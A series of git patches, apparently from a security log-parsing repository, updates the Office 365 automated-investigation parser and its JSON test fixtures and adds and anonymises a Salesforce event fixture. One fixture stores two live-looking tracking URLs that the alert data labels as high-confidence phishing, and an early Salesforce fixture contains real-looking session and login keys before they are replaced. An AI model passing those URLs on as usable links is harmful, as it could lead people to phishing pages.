+            "https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz49R6-2B-2FASLo-2BUtlyP-2F4iSjQlm-2F4HWFki90oq-2Bc29Sr-2BJAxlu_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6qR2GRWjTyLjKHBwmcXgTV-2BMq0R5qnuDMHYAbrFxAmtHiepp1aU8L-2FOCt-2BiboZksoqBfuo-2FcqBrfi9un8ILJByRUOZM3T6alRzsB1jmdLOKOZwr3m8kymuz3dFvNya6aYPmSZG4l57ycCGBya5xMMqf",
+            "https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xzwS57HzRFV06M2bzMBaRY-2BtdD2HhGOqR6HD9j7eU3woqib3lW0qFsRIYtEfnDRINtIJErjGpQG2ad3jjAbAIacwJ4Le0eScR4TY1ExyusbvGQU5p_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6psejQMn2EzritsHjoZX3rBM6GN1Gt7OeDjl2fzK-2BAK5-2FzHIjoTmyFKIkBvxn4mrKqstgF5tkhF6rc-2BIL2TqH7FTpqHdxk6lMOLfZVS4DrhiP-2FvyHZwSo2RzY-2BDmTRvcBEOqOwutpZKgr0m7fArTF-2Fv"
+          ]
+        },
+        "emails": [
+          {
+            "message_ids": [
+              "24b8430c-484d-4ee0-e12b-08dcee99416a",
+              "2e99f39a-c998-4d94-2085-08dce9cd0b7d",
+              "0ac4ee3c-7c79-408e-76c2-08dcf4106b65",
+              "fd400540-8a8d-42ae-d1f9-08dced20c42f",
+              "31cfca73-f309-4e21-cbc4-08dceed074cf",
+              "0491b33a-15fc-4503-9dd1-08dced818f57",
+              "4b620244-917b-4a04-7416-08dcf50af378",
+              "1abed68d-3b03-46bd-45e2-08dcf43fb625",
+              "abb4c4a5-7049-4047-5a68-08dcec201c1f",
+              "92bba720-15bc-4f09-49f2-08dcf8d738a4",
+              "3d511617-b717-416c-89cf-08dcf90a51c7",
+              "c3ad4b6b-0fd9-4510-4481-08dcf9043502",
+              "37b236bd-ad39-41c0-3984-08dcf85e6b44",
+              "a1d9684c-9982-4f80-880c-08dcf775c1a9"
+            ]
+          },
+          {
+            "message_ids": [
+              "37b236bd-ad39-41c0-3984-08dcf85e6b44"
+            ]
+          },
+          {
+            "delivery": {
+              "action": "Blocked",
+              "location": "Quarantine",
+              "original_location": "Inbox"
+            },
+            "direction": "Inbound",
+            "language": "fr",
+            "message_ids": [
+              "37b236bd-ad39-41c0-3984-08dcf85e6b44"
+            ]
+          }
+        ],
+        "id": "urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101",
+        "name": "Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101",
+        "status": "Pending Action",
+        "threats": [
+          "['ZapPhish', 'HighConfPhish']"
+        ],
+        "type": "ZappedUrlInvestigation"
+      },
+      "record_type": 64,
+      "user_type": {
+        "code": 4,
+        "name": "System"
+      }
+    },
+    "organization": {
+      "id": "xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx"
+    },
+    "related": {
+      "user": [
+        "AirInvestigation"
+      ]
+    },
+    "rule": {
+      "name": "Email messages containing malicious URL removed after delivery\u200b"
+    },
+    "service": {
+      "name": "AirInvestigation"
+    },
+    "user": {
+      "id": "AirInvestigation",
+      "name": "AirInvestigation"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json
index 62483cf44..6e6d8fd0f 100644
--- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json	
+++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json	
@@ -82,6 +82,7 @@
             "http://1.2.3.7"
           ]
         },
+        "emails": [],
         "id": "urn:ZappedUrlInvestigation:a10a976d-6e3e-4d10-be50-4907183b6f86",
         "name": "Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a1",
         "status": "Remediated",
diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json
index d1b102ddf..a3a57df24 100644
--- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json	
+++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json	
@@ -79,7 +79,23 @@
         },
         "emails": [
           {
-            "message_ids": "['01a2bcd3-efab-4c56-7890-12defa3bc4d', '0123a456-b789-0cd1-e23f-45abcd6ef78', 'ab12cde3-f456-789a-01bc-23defa4bc5d', '01a2b345-67c8-9012-345d-67efabc8d90e', '01a234b5-6789-012c-3d4e-56fabcd7ef8', 'a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6', '0a1b23c4-567d-8901-2345-67efabc8d90a', '0123a4b5-678c-9d0e-1f23-45abcde6fa78', '0a1b234c-5678-90d1-2efa-34bcdef5a6b7', '0123a4bc-5d6e-78f9-0123-45abcde67890']"
+            "message_ids": [
+              "01a2bcd3-efab-4c56-7890-12defa3bc4d",
+              "0123a456-b789-0cd1-e23f-45abcd6ef78",
+              "ab12cde3-f456-789a-01bc-23defa4bc5d",
+              "01a2b345-67c8-9012-345d-67efabc8d90e",
+              "01a234b5-6789-012c-3d4e-56fabcd7ef8",
+              "a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6",
+              "0a1b23c4-567d-8901-2345-67efabc8d90a",
+              "0123a4b5-678c-9d0e-1f23-45abcde6fa78",
+              "0a1b234c-5678-90d1-2efa-34bcdef5a6b7",
+              "0123a4bc-5d6e-78f9-0123-45abcde67890"
+            ]
+          },
+          {
+            "message_ids": [
+              "ab12cde3-f456-789a-01bc-23defa4bc5d"
+            ]
           },
           {
             "delivery": {
diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json
index fe752fcbe..61b656511 100644
--- a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json	
+++ b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json	
@@ -85,6 +85,20 @@
             "https://example.org"
           ]
         },
+        "emails": [
+          {
+            "delivery": {
+              "action": "Blocked",
+              "location": "Quarantine",
+              "original_location": "Inbox"
+            },
+            "direction": "Inbound",
+            "language": "en",
+            "message_ids": [
+              "3fe5777d-1fb7-4f34-bb1e-035e4df1f96f"
+            ]
+          }
+        ],
         "id": "urn:ZappedFileInvestigation:adffaf6ed0f17079cf14e9dc2adf9c1d",
         "name": "Mail with malicious file is zapped - urn:ZappedFileInvestigation:adffaf6ed0f17079cf14e9dc2adf9c1d",
         "status": "Investigation Started",

From 498e60ad8198791aac6bc7c4cd3559e7668e189f Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Wed, 6 Nov 2024 15:32:02 +0200
Subject: [PATCH 196/317] cleanup parser

---
 Office 365/o365/ingest/parser.yml | 34 +++++++++++--------------------
 1 file changed, 12 insertions(+), 22 deletions(-)

diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 61a06f847..07ea2f0c8 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -494,26 +494,16 @@ stages:
       - set:
           office365.investigation.emails: >
             [
-              {%- for action in json_event.message.Actions | map("from_json") -%}
-                {%- for entity in action.Entities -%}
-                {
-                  {%- if entity.AntispamDirection != null -%}"direction": "{{entity.AntispamDirection}}",{%- endif -%}
-                  {%- if entity.NetworkMessageIds != null -%}"message_ids": {{entity.NetworkMessageIds}},{%- endif -%}
-                  {%- if entity.NetworkMessageId != null -%}"message_ids": ["{{entity.NetworkMessageId}}"],{%- endif -%}
-                  {%- if entity.Language != null -%}"language": "{{entity.Language}}",{%- endif -%}
-                  {%- if entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%}
-                    "delivery": {
-                      {%- if entity.DeliveryAction!= null -%}"action": "{{entity.DeliveryAction}}",{%- endif -%}
-                      {%- if entity.DeliveryLocation != null -%}"location": "{{entity.DeliveryLocation}}",{%- endif -%}
-                      {%- if entity.OriginalDeliveryLocation -%}"original_location": "{{entity.OriginalDeliveryLocation}}",{%- endif -%}
-                    },
-                  {%- endif -%}
-                },
-                {%- endfor -%}
-              {%- endfor -%}
-
-              {%- for entity in parse_data.ParsedData.Entities -%}
-                {%- if entity.AntispamDirection != null or entity.NetworkMessageIds != null or entity.Language != null or entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%}
+              {% set total_entities = [] %}
+              {% for action in json_event.message.Actions | map("from_json") %}
+                {% for entity in action.Entities %}
+                  {% set total_entities = total_entities.append(entity) %}
+                {% endfor %}
+              {% endfor %}
+              {% for entity in parse_data.ParsedData.Entities %}
+                {% set total_entities = total_entities.append(entity) %}
+              {% endfor %}
+              {%- for entity in total_entities -%}
                 {
                   {%- if entity.AntispamDirection != null -%}"direction": "{{entity.AntispamDirection}}",{%- endif -%}
                   {%- if entity.NetworkMessageIds != null -%}"message_ids": {{entity.NetworkMessageIds}},{%- endif -%}
@@ -527,17 +517,17 @@ stages:
                     },
                   {%- endif -%}
                 },
-                {%- endif -%}
               {%- endfor -%}
             ]
         filter: '{{(json_event.message.get("Actions") != None and json_event.message.Actions | map("from_json") | rejectattr("Entities") | list | length  !=  json_event.message.Actions | list | length) or parse_data.ParsedData.get("Entities", []) | length > 0}}'
 
+      # Filter step to remove duplicates from the list
       - set:
           office365.investigation.emails: >
             [
               {% set result = [] %}
               {% for data in final.office365.investigation.emails %}
-                {% if data not in result %}
+                {% if data not in result and data != {} %}
                   {% set result = result.append(data) %}
                 {% endif %}
               {% endfor %}

From 4154e0ae785eb3b0a71393a338ecaf0185d827b3 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Wed, 6 Nov 2024 15:39:35 +0200
Subject: [PATCH 197/317] Fix: Salesforce USER_AGENT

---
 .../tests/salesforce_apex_rest_api.json       | 72 +++++++++++++++++++
 1 file changed, 72 insertions(+)
 create mode 100644 Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json

diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
new file mode 100644
index 000000000..bc47bdc36
--- /dev/null
+++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
@@ -0,0 +1,72 @@
+{
+  "input": {
+    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}"
+  },
+  "expected": {
+    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "ApexRestApi",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2034-02-21T02:48:31.272150Z",
+    "http": {
+      "request": {
+        "method": "POST"
+      },
+      "response": {
+        "mime_type": "application/json",
+        "status_code": 200
+      }
+    },
+    "organization": {
+      "id": "00D2000000015O7"
+    },
+    "related": {
+      "ip": [
+        "129.185.166.150"
+      ]
+    },
+    "salesforce": {
+      "login": {
+        "key": "MJK3WHqyl1nGTQHf"
+      },
+      "request": {
+        "id": "5-Acr8biM2uu2UsrkBY5B-",
+        "status": "S"
+      },
+      "session": {
+        "key": {
+          "id": "E6btf+6MZDOBIAEF"
+        }
+      },
+      "user": {
+        "type": "Standard"
+      }
+    },
+    "source": {
+      "address": "129.185.166.150",
+      "ip": "129.185.166.150"
+    },
+    "url": {
+      "path": "/requests"
+    },
+    "user": {
+      "id": "0057R000008Vnyi"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "Other",
+      "original": "9999",
+      "os": {
+        "name": "Other"
+      }
+    }
+  }
+}
\ No newline at end of file

From b6d4a9e42babc2d32b3734b4ffc2c06a1aba6a5d Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Wed, 6 Nov 2024 15:44:25 +0200
Subject: [PATCH 198/317] fix test

---
 .../tests/salesforce_apex_rest_api.json          | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
index bc47bdc36..8c729ea91 100644
--- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
+++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
@@ -1,9 +1,9 @@
 {
   "input": {
-    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}"
+    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}"
   },
   "expected": {
-    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}",
+    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}",
     "event": {
       "category": [
         "network"
@@ -24,16 +24,16 @@
       }
     },
     "organization": {
-      "id": "00D2000000015O7"
+      "id": "11111111111111111"
     },
     "related": {
       "ip": [
-        "129.185.166.150"
+        "1.2.3.4"
       ]
     },
     "salesforce": {
       "login": {
-        "key": "MJK3WHqyl1nGTQHf"
+        "key": "xxxxxxxxxxxxxx"
       },
       "request": {
         "id": "5-Acr8biM2uu2UsrkBY5B-",
@@ -49,14 +49,14 @@
       }
     },
     "source": {
-      "address": "129.185.166.150",
-      "ip": "129.185.166.150"
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
     },
     "url": {
       "path": "/requests"
     },
     "user": {
-      "id": "0057R000008Vnyi"
+      "id": "user123123123123"
     },
     "user_agent": {
       "device": {

From fc4fc8f197c1c509f4e6b82cbd042d406d4bdbf2 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Wed, 6 Nov 2024 15:44:54 +0200
Subject: [PATCH 199/317] fix test

---
 .../salesforce-events/tests/salesforce_apex_rest_api.json   | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
index 8c729ea91..c6a4ab44a 100644
--- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
+++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
@@ -1,9 +1,9 @@
 {
   "input": {
-    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}"
+    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}"
   },
   "expected": {
-    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}",
+    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}",
     "event": {
       "category": [
         "network"
@@ -41,7 +41,7 @@
       },
       "session": {
         "key": {
-          "id": "E6btf+6MZDOBIAEF"
+          "id": "session-key12323"
         }
       },
       "user": {

From 0b6ea3a3378799d0028d2b7d16e3085c2dde2799 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Wed, 6 Nov 2024 16:10:27 +0200
Subject: [PATCH 200/317] Change salesforce user_agent

---
 Salesforce/salesforce-events/_meta/fields.yml   |  5 +++++
 Salesforce/salesforce-events/ingest/parser.yml  |  2 +-
 .../tests/salesforce_apex_rest_api.json         | 17 ++++-------------
 .../tests/salesforce_complete_event_1.json      | 13 +++----------
 4 files changed, 13 insertions(+), 24 deletions(-)

diff --git a/Salesforce/salesforce-events/_meta/fields.yml b/Salesforce/salesforce-events/_meta/fields.yml
index ec92923ea..29be61136 100644
--- a/Salesforce/salesforce-events/_meta/fields.yml
+++ b/Salesforce/salesforce-events/_meta/fields.yml
@@ -117,3 +117,8 @@ salesforce.user.type:
   description: Salesforce user type
   name: salesforce.user.type
   type: keyword
+
+salesforce.user_agent:
+  description: Salesforce user agent
+  name: salesforce.user_agent
+  type: number
diff --git a/Salesforce/salesforce-events/ingest/parser.yml b/Salesforce/salesforce-events/ingest/parser.yml
index 7a3452fa9..01b66855f 100644
--- a/Salesforce/salesforce-events/ingest/parser.yml
+++ b/Salesforce/salesforce-events/ingest/parser.yml
@@ -72,7 +72,7 @@ stages:
         filter: "{{json_event.output.BROWSER_TYPE != None}}"
 
       - set:
-          user_agent.original: "{{json_event.output.USER_AGENT}}"
+          salesforce.user_agent: "{{json_event.output.USER_AGENT | int}}"
         filter: "{{json_event.output.USER_AGENT != None}}"
 
